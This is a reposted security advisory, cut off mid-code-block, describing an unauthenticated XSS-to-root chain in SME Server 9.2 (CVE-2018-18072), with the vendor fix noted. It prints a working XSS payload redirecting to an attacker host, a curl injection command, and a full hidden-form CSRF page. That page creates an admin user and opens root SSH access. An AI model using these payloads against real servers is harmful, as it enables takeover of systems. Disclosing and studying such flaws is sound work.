{"id":14258,"date":"2019-01-07T14:19:07","date_gmt":"2019-01-07T22:19:07","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2019\/01\/07\/news-8010\/"},"modified":"2019-01-07T14:19:07","modified_gmt":"2019-01-07T22:19:07","slug":"news-8010","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2019\/01\/07\/news-8010\/","title":{"rendered":"SSD Advisory \u2013 SME Server Unauthenticated XSS To Privileged Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 07 Jan 2019 13:21:59 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes a vulnerability in SME Server 9.2, which lets an unauthenticated attackers perform XSS attack that leads to remote code execution as root. SME Server is a Linux distribution for small and medium enterprises by Koozali foundation.<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-18072<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Karn Ganeshen has reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Affected systems<\/strong><br \/> SME Server 9.2<\/p>\n<p><strong>Vendor Response<\/strong><br \/> Fixed in phpki-0.82-17.el6.sme, phpki-0.82-18.el6.sme, phpki-0.82-19.el6.sme<br \/> <span id=\"more-3769\"><\/span><strong>Vulnerability Details<\/strong><br \/> Software for the SME Server is packaged using RPM Package Manager (RPM) system. Existing packages from CentOS and other third-party developers are used. The SME  Server uses packages from the open source community. Packages are called as contribs. Each contrib adds a specific functionality to the SME server&nbsp; deployment. Once a contrib is installed, the corresponding Menu or web panel is added to the SME HTTP management portal. The default admin user has access to all contrib Menus. admin can create a new user and assign access of specific web panels (functionality) to the user. The user can, then, view, access and administer only those specific web panels.<\/p>\n<p>The vulnerable components are the &#8220;Certificate Management&#8221; &amp; &#8220;Advanced Web Statistics&#8221;, Which are vulnerable to Cross-Site Scripting &amp; Cross-Site Request Forgery.<br \/> For the next demonstration , the Attackers IP is 192.168.1.2 and the SME Server IP 192.168.1.109.<\/p>\n<p>The exploitation starts with the contrib \u2013 PHPKI &#8211; smeserver-phpki. This contrib provides a Certificate Management functionality. The administrator adds new certificates, which the users&nbsp;can download and set up in their browsers. The Certificate Management portal is accessible at https:\/\/&lt;SME Server IP&gt;\/phpki\/.<br \/> It should look like this:<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-PHPki-page.png\" data-slb-active=\"1\" data-slb-asset=\"1069610058\" data-slb-internal=\"0\" data-slb-group=\"3769\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3770\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-PHPki-page-300x85.png\" alt=\"\" width=\"752\" height=\"213\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-PHPki-page-300x85.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-PHPki-page-768x219.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-PHPki-page.png 944w\" sizes=\"auto, (max-width: 752px) 100vw, 752px\" \/><\/a><\/p>\n<p>All users can access this without any authentication. The portal provides a Search function where a user can search for existing certificates.<\/p>\n<p><strong>Exploit<\/strong><br \/> <b>1)&nbsp;<\/b>Reflected XSS [Pre-Auth] https:\/\/192.168.1.109\/phpki\/search.php\/&#8221;&gt;&lt;script&gt;alert(&#8220;xss-phpki&#8221;)&lt;\/script&gt; . We can now see that this component is vulnerable to XSS.<br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-step1.png\" data-slb-active=\"1\" data-slb-asset=\"333856368\" data-slb-internal=\"0\" data-slb-group=\"3769\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3771\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-step1-300x93.png\" alt=\"\" width=\"668\" height=\"207\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-step1-300x93.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-step1-768x239.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-step1-1024x319.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-step1.png 1075w\" sizes=\"auto, (max-width: 668px) 100vw, 668px\" \/><\/a><br \/> Now lets arm the payload: We will inject the following payload: &#8220;&gt;&lt;script&gt;document.location=&#8221;http:\/\/192.168.1.2\/ssd.html&#8221;&lt;\/script&gt;<br \/> Issue the following request: curl &#8216;https:\/\/192.168.1.109\/phpki\/search.php\/&#8221;&gt;&lt;script&gt;document.location=&#8221;http:\/\/192.168.1.2\/ssd.html&#8221;&lt;\/script&gt;&#8217; &#8211;insecure This payload is injected in the back-end (Stored-XSS) and used by another contrib, Awstats.<br \/> <b>2)<\/b>&nbsp;Start a web server on Attacker IP to serve our evil form \u2013 ssd.html<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5c33d05b501b1094798432\" class=\"crayon-syntax crayon-theme-shell-default crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> $ sudo python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p><b>3)<\/b>&nbsp;Stored XSS + Cross-Site Request Forgery The next step in exploitation, targets the web panel &#8211; Advanced Web Statistics 7.1 (build 1.983).&nbsp; This contrib \u2013 smeserver-awstats.noarch \u2013 provides functionality to monitor web traffic to the&nbsp; server. The following steps are from Admin point of view.<\/p>\n<p><b>1+ Admin logs in <\/b><br \/> <b>2+ Admin accesses Web Statistics -&gt; Show -&gt; Navigation (Full List \u2013 urldetail) This is the full list of all page urls accessed, which opens up &#8211; https:\/\/192.168.1.109\/servermanager\/cgi-bin\/.awstats\/awstats.pl config=mycompany.local&amp;lang=auto&amp;output=urldetail <\/b><br \/> <b>3+ Admin clicks on the entry:<\/b><\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-admin-access.png\" data-slb-active=\"1\" data-slb-asset=\"1881653400\" data-slb-internal=\"0\" data-slb-group=\"3769\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3772\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-admin-access-300x84.png\" alt=\"\" width=\"781\" height=\"219\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-admin-access-300x84.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-admin-access-768x216.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-admin-access-1024x288.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Sme-Server-admin-access.png 1075w\" sizes=\"auto, (max-width: 781px) 100vw, 781px\" \/><\/a><\/p>\n<p><strong>4+ This opens a new page about details on this entry.<\/strong><br \/> <strong>5+ XSS Payload executes and fetches ssd.html from our server.<\/strong><\/p>\n<p>Now, on the attackers console:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5c33d05b501b8828389222\" class=\"crayon-syntax crayon-theme-shell-default crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [bash-3.2$ sudo python -m SimpleHTTPServer 80 [password: Serving HTTP on 0.0.0.0 port 80 &#8230; 192.168.1.2 &#8211; &#8211; [10\/9\/2018 08:30:23] &#8220;GET \/ssd.html HTTP\/1.1&#8221; 200 &#8211;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501b8828389222-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501b8828389222-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501b8828389222-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501b8828389222-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501b8828389222-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sudo <\/span><span class=\"crayon-v\">python<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">m<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">SimpleHTTPServer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501b8828389222-2\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501b8828389222-3\"><span class=\"crayon-e\">Serving <\/span><span class=\"crayon-e\">HTTP <\/span><span class=\"crayon-i\">on<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0.0.0.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501b8828389222-4\"><span class=\"crayon-cn\">192.168.1.2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2018<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">30<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;GET \/ssd.html HTTP\/1.1&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>The page that the victim will get is:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5c33d05b501ba709625629\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">JavaScript<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;html&gt;  &lt;\/html&gt;  &lt;head&gt;     &lt;title&gt;Evil Form &#8211; Add user5 + Set Password + assign panel access &#8211; XSS+CSRF&lt;\/title&gt;     &lt;script type=&#8221;text\/javascript&#8221;&gt;         function exec1() {             document.getElementById(&#8216;1&#8217;).submit();             setTimeout(exec2, 3000);         }          function exec2() {             document.getElementById(&#8216;2&#8217;).submit();             setTimeout(exec3, 3000);         }          function exec3() {             document.getElementById(&#8216;3&#8217;).submit();             setTimeout(exec4, 3000);         }          function exec4() {             alert(&#8220;4&#8221;);             document.getElementById(&#8216;4&#8242;).submit();         }         \/\/\t\t\t\twindow.onbeforeunload=function(){         \/\/\t\t\t\treturn\t&#8220;please\twait&#8221;;         \/\/\t\t\t\t}     &lt;\/script&gt; &lt;\/head&gt;  &lt;body onload=&#8217;exec1()&#8217;&gt;     &lt;!&#8211; Add\tnew\tuser\t&#8211;&gt;     &lt;form id=&#8217;1&#8242; target=&#8221;if1&#8243; name=&#8221;badform_1&#8243; method=&#8221;post&#8221; action=&#8221;https:\/\/192.168.1.109\/server-manager\/cgi-bin\/useraccounts&#8221;&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;page&#8221; value=&#8221;1&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;page_stack&#8221; value=&#8221;0&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;.id&#8221; value=&#8221;0d41969df339a1a62711edf93f48a673&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;acctName&#8221; value=&#8221;user5&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;action&#8221; value=&#8221;create&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;FirstName&#8221; value=&#8221;user5&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;LastName&#8221; value=&#8221;lname&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;Dept&#8221; value=&#8221;Main&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;Company&#8221; value=&#8221;XYZ+Corporation&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;Street&#8221; value=&#8221;123+Main+Street&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;City&#8221; value=&#8221;Ottawa&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;Phone&#8221; value=&#8221;555-5555&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;EmailForward&#8221; value=&#8221;local&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;ForwardAddress&#8221; value=&#8221;&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;VPNClientAccess&#8221; value=&#8221;no&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;groupMemberships&#8221; value=&#8221;admingroup&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;Next&#8221; value=&#8221;Add&#8221; \/&gt;     &lt;\/form&gt;     &lt;!&#8211; Set\tpassword\tfor\tnew\tuser\t&#8211;&gt;     &lt;form id=&#8217;2&#8242; target=&#8221;if2&#8243; name=&#8221;badform_2&#8243; method=&#8221;post&#8221; action=&#8221;https:\/\/192.168.1.109\/server-manager\/cgi-bin\/useraccounts&#8221;&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;page&#8221; value=&#8221;4&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;page_stack&#8221; value=&#8221;3&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;.id&#8221; value=&#8221;0d41969df339a1a62711edf93f48a673&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;acctName&#8221; value=&#8221;user5&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;password1&#8243; value=&#8221;SSDpassword@12345&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;password2&#8243; value=&#8221;SSDpassword@12345&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;Next&#8221; value=&#8221;Save&#8221; \/&gt;     &lt;\/form&gt;     &lt;!&#8211; Assign\tpanel\taccess\tto\tnew\tuser.\tMore\tcan\tbe\tadded\tfor\tadditional\taccess.&#8211;&gt;     &lt;form id=&#8217;3&#8242; target=&#8221;if3&#8243; name=&#8221;badform_3&#8243; method=&#8221;post&#8221; action=&#8221;https:\/\/192.168.1.109\/server-manager\/cgi-bin\/userpanelaccess&#8221;&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;panelAccess&#8221; value=&#8221;remoteuseraccess&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;panelAccess&#8221; value=&#8221;viewlogfiles&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;panelAccess&#8221; value=&#8221;groups&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;panelAccess&#8221; value=&#8221;userpanelaccess&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;panelAccess&#8221; value=&#8221;userpanel-password&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;panelAccess&#8221; value=&#8221;userpanel-sshkeys&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;panelAccess&#8221; value=&#8221;userpanel-useraccounts&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;panelAccess&#8221; value=&#8221;userpanel-userbackup&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;action&#8221; value=&#8221;Modify&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;acct&#8221; value=&#8221;user5&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;state&#8221; value=&#8221;performModifyAccess&#8221; \/&gt;     &lt;\/form&gt;     &lt;!&#8211; Change\tremote\taccess\tsettings\t&#8211; Open\tup\tRemote\tAccess\tfrom\tpublic\tInternet\t&#8211;&gt;     &lt;form id=&#8217;4&#8242; target=&#8221;if4&#8243; name=&#8221;badform_4&#8243; method=&#8221;post&#8221; action=&#8221;https:\/\/192.168.1.109\/server-manager\/cgi-bin\/remoteaccess&#8221;&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;page&#8221; value=&#8221;0&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;page_stack&#8221; value=&#8221;&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;.id&#8221; value=&#8221;2e7d2cda4ce6b680499d4b2ee8eb7831&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;pptpSessions&#8221; value=&#8221;0&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;validFromNetwork&#8221; value=&#8221;&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;validFromMask&#8221; value=&#8221;&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;sshAccess&#8221; value=&#8221;public&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;sshPermitRootLogin&#8221; value=&#8221;yes&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;sshPasswordAuthentication&#8221; value=&#8221;yes&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;sshTCPPort&#8221; value=&#8221;22&#8243; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;FTPAccess&#8221; value=&#8221;normal&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;FTPPasswordLogin&#8221; value=&#8221;public&#8221; \/&gt;         &lt;input type=&#8221;hidden&#8221; name=&#8221;Next&#8221; value=&#8221;Save&#8221; \/&gt;     &lt;\/form&gt;     &lt;iframe name=&#8221;if1&#8243; style=&#8221;display:\thidden=&#8221; width=&#8221;0&#8243; height=&#8221;0&#8243; frameborder=&#8221;0&#8243;&gt;&lt;\/iframe&gt;     &lt;iframe name=&#8221;if2&#8243; style=&#8221;display:\thidden=&#8221; width=&#8221;0&#8243; height=&#8221;0&#8243; frameborder=&#8221;0&#8243;&gt;&lt;\/iframe&gt;     &lt;iframe name=&#8221;if3&#8243; style=&#8221;display:\thidden=&#8221; width=&#8221;0&#8243; height=&#8221;0&#8243; frameborder=&#8221;0&#8243;&gt;&lt;\/iframe&gt;     &lt;iframe name=&#8221;if4&#8243; style=&#8221;display:\thidden=&#8221; width=&#8221;0&#8243; height=&#8221;0&#8243; frameborder=&#8221;0&#8243;&gt;&lt;\/iframe&gt; &lt;\/body&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5c33d05b501ba709625629-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5c33d05b501ba709625629-36\">36<\/div>\n<div class=\"crayon-num\" 